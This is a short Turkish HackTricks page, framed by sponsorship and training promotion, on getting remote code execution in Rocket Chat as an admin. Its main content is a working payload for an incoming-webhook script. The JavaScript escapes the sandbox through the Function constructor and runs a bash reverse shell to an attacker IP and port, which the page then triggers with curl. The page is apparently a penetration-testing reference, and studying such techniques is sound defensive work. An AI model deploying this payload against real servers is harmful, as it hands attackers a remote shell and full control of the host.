Turkish - Ht
HackTricks Training Twitter Linkedin Sponsor

Rocket Chat

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

  • Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!

  • Resmi PEASS & HackTricks ürünlerini edinin

  • [The PEASS Family]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [NFT'lerimiz]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu

  • **💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm'de takip edin.

  • Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.

RCE

Eğer Rocket Chat içinde adminseniz RCE elde edebilirsiniz.

  • Integrations'a gidin ve New Integration'ı seçin ve herhangi birini seçin: Incoming WebHook veya Outgoing WebHook.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

  • WebHook'u yapılandırın (kanal ve kullanıcı adı olarak gönderi mevcut olmalıdır):

  • WebHook betiğini yapılandırın:

  • Değişiklikleri kaydedin

  • Oluşturulan WebHook URL'sini alın:

  • Curl ile çağırın ve ters shell'i almalısınız

Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları:

PreviousPythonNextSpecial HTTP headers

Last updated